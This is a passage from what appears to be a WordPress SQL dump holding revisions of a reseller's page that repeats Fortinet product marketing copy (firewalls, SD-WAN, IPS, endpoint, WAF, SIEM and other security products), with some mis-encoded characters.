certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.</li>\r\n 	<li><strong>Protect mission critical applications</strong>Highly scalable segmentation and ultra-low latency to protect network segments.</li>\r\n 	<li><strong>Continuous risk assessment via automation</strong>Leverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.</li>\r\n 	<li><strong>Security Fabric integration</strong>Intelligently share threats across the entire digital attack surface to provide quick and automated protection.</li>\r\n 	<li><strong>Enterprise class security management</strong>Deliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.</li>\r\n</ul>\r\n2.Â <strong>Secure SD-WAN</strong>\r\n\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n3.Â <strong>IPS</strong>\r\n\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.</li>\r\n 	<li><strong>High performance</strong>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.</li>\r\n 	<li><strong>Advanced threat protection</strong>Seamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.</li>\r\n 	<li><strong>Security Fabric integration</strong>Integration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.</li>\r\n 	<li><strong>Data leak protection</strong>File protection controls to prevent sensitive data exfiltration.</li>\r\n</ul>\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong>\r\nPrevent breaches and secure data in transit at a very high speed.</li>\r\n 	<li><strong>Scalable Security</strong>\r\nScalable security that is seamlessly integrated with routing.</li>\r\n 	<li><strong>Comprehensive data communications security</strong>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.</li>\r\n 	<li><strong>Diverse VPNs</strong>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.</li>\r\n 	<li><strong>Security Fabric Integration</strong>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.</li>\r\n 	<li><strong>Unified Management</strong>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.</li>\r\n</ul>\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong>\r\nBig picture perspective allows you to see the forest through the tree.</li>\r\n 	<li><strong>Cross Silo Automation</strong>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.</li>\r\n 	<li><strong>Simplified Management</strong>\r\nStreamline deployment and management, reducing task time and improving response time.</li>\r\n 	<li><strong>Rapid Detection</strong>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.</li>\r\n 	<li><strong>Fortinet Fabric</strong>\r\nCentralized control over all of your Fortinet network assets.</li>\r\n</ul>\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong>FortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.</li>\r\n 	<li><strong>Proactive endpoint defense</strong>Anti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.</li>\r\n 	<li><strong>Automated threat containment</strong>Integration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.</li>\r\n 	<li><strong>Secure remote access</strong>Reliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.</li>\r\n 	<li><strong>Easy to deploy and manage</strong>Easy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.</li>\r\n</ul>\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong>Integration with FortiGate firewalls extends your security fabric out to the edge of the network.</li>\r\n 	<li><strong>Superior density, scalability and mobility</strong>Handle even the most complex RF environments.</li>\r\n 	<li><strong>Zero-touch deployment</strong>Fast and simple deployment with no requirements for onsite tech support.</li>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong>No licenses to manage, just plug and go.</li>\r\n 	<li><strong>Free location and analytics</strong>Wireless device locationing tools included with no additional licenses required.</li>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong>A range of platforms for any sized deployment.</li>\r\n</ul>\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.</li>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.</li>\r\n 	<li><strong>Highly Scalable</strong>Broad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.</li>\r\n 	<li><strong>Unparalleled Visibility</strong>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.</li>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.</li>\r\n 	<li><strong>Virtual Stacking</strong>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.</li>\r\n</ul>\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong>Maintain productivity by shielding end users from unwanted spam and malicious phishing attacks.</li>\r\n 	<li><strong>Independently certified advanced threat defense</strong>Thwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.</li>\r\n 	<li><strong>Integrated data protection</strong>Maintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.</li>\r\n 	<li><strong>High-performance mail handling</strong>\r\nSpeed the delivery of legitimate email at an affordable cost.</li>\r\n 	<li><strong>Enterprise-class management</strong>\r\nFree staff and end users to drive the business by reducing time spent on email administration.</li>\r\n</ul>\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong>FortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.</li>\r\n 	<li><strong>AI-based Threat Detection</strong>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.</li>\r\n 	<li><strong>Security Fabric Integration</strong>Integration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.</li>\r\n 	<li><strong>Hardware-based Acceleration</strong>FortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.</li>\r\n 	<li><strong>False Positive Mitigation Tools</strong>Advanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.</li>\r\n 	<li><strong>Advanced Visual Analytics</strong>FortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.</li>\r\n</ul>\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.</li>\r\n 	<li><strong>Application Optimization</strong>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.</li>\r\n 	<li><strong>Security Fabric Integration</strong>AV and Sandbox integration scans attachments to protect from the latest threats.</li>\r\n 	<li><strong>Global Server Load Balancing</strong>Distributes traffic across multiple geographical locations for disaster recovery.</li>\r\n 	<li><strong>Security Features</strong>Web Application Firewall, Web Filtering, and IP Reputation for enhanced security.</li>\r\n</ul>\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.</li>\r\n 	<li><strong>Intelligent automation</strong>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.</li>\r\n 	<li><strong>All-in-one</strong>Simplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.</li>\r\n 	<li><strong>Flexible deployment</strong>Available as a physical or virtual appliance on premises, as well as a cloud-based or managed service.</li>\r\n 	<li><strong>Open extensibility</strong>Flexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.</li>\r\n</ul>\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong>Visibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.</li>\r\n 	<li><strong>Rapid Integrations and Scalability</strong>Network aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.</li>\r\n 	<li><strong>Automated Workflow</strong>A leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.</li>\r\n 	<li><strong>Unified Platform</strong>Multi-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.</li>\r\n</ul>\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong>Enhanced data visibility with machine learning and UEBA to identify threats.</li>\r\n 	<li><strong>Rapid Threat Detection</strong>AI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.</li>\r\n 	<li><strong>Regulatory Compliance Support</strong>Support regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.</li>\r\n 	<li><strong>Data Security</strong>Monitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.</li>\r\n 	<li><strong>Forensic-level Reporting</strong>Compile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.</li>\r\n 	<li><strong>Valuable Insights</strong>Analyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2018-12-17 12:23:25','2018-12-17 04:23:25','',1474,'https://bintara.com.my/blog/2018/12/17/1474-revision-v1/',0,'revision','',0),(2278,1,'2018-12-17 12:22:15','2018-12-17 04:22:15','Fortinet provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3>NETWORK SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Next Generation Firewall (NGFW)</strong></li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>High-performance threat protection</strong>\r\n\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.</li>\r\n 	<li><strong>Validated security effectiveness</strong>\r\n\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.</li>\r\n 	<li><strong>Protect mission critical applications</strong>\r\n\r\nHighly scalable segmentation and ultra-low latency to protect network segments.</li>\r\n 	<li><strong>Continuous risk assessment via automation</strong>\r\n\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.</li>\r\n 	<li><strong>Security Fabric integration</strong>\r\n\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.</li>\r\n 	<li><strong>Enterprise class security management</strong>\r\n\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.</li>\r\n</ul>\r\n2.Â <strong>Secure SD-WAN</strong>\r\n\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n3.Â <strong>IPS</strong>\r\n\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.</li>\r\n 	<li><strong>High performance</strong>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.</li>\r\n 	<li><strong>Advanced threat protection</strong>\r\n\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.</li>\r\n 	<li><strong>Security Fabric integration</strong>\r\n\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.</li>\r\n 	<li><strong>Data leak protection</strong>\r\n\r\nFile protection controls to prevent sensitive data exfiltration.</li>\r\n</ul>\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong>\r\nPrevent breaches and secure data in transit at a very high speed.</li>\r\n 	<li><strong>Scalable Security</strong>\r\nScalable security that is seamlessly integrated with routing.</li>\r\n 	<li><strong>Comprehensive data communications security</strong>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.</li>\r\n 	<li><strong>Diverse VPNs</strong>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.</li>\r\n 	<li><strong>Security Fabric Integration</strong>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.</li>\r\n 	<li><strong>Unified Management</strong>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.</li>\r\n</ul>\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong>\r\nBig picture perspective allows you to see the forest through the tree.</li>\r\n 	<li><strong>Cross Silo Automation</strong>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.</li>\r\n 	<li><strong>Simplified Management</strong>\r\nStreamline deployment and management, reducing task time and improving response time.</li>\r\n 	<li><strong>Rapid Detection</strong>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.</li>\r\n 	<li><strong>Fortinet Fabric</strong>\r\nCentralized control over all of your Fortinet network assets.</li>\r\n</ul>\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong>\r\n\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.</li>\r\n 	<li><strong>Proactive endpoint defense</strong>\r\n\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.</li>\r\n 	<li><strong>Automated threat containment</strong>\r\n\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.</li>\r\n 	<li><strong>Secure remote access</strong>\r\n\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.</li>\r\n 	<li><strong>Easy to deploy and manage</strong>\r\n\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.</li>\r\n</ul>\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong>\r\n\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.</li>\r\n 	<li><strong>Superior density, scalability and mobility</strong>\r\n\r\nHandle even the most complex RF environments.</li>\r\n 	<li><strong>Zero-touch deployment</strong>\r\n\r\nFast and simple deployment with no requirements for onsite tech support.</li>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong>\r\n\r\nNo licenses to manage, just plug and go.</li>\r\n 	<li><strong>Free location and analytics</strong>\r\n\r\nWireless device locationing tools included with no additional licenses required.</li>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong>\r\n\r\nA range of platforms for any sized deployment.</li>\r\n</ul>\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.</li>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.</li>\r\n 	<li><strong>Highly Scalable</strong>\r\n\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.</li>\r\n 	<li><strong>Unparalleled Visibility</strong>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.</li>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.</li>\r\n 	<li><strong>Virtual Stacking</strong>\r\nFortiLink enables 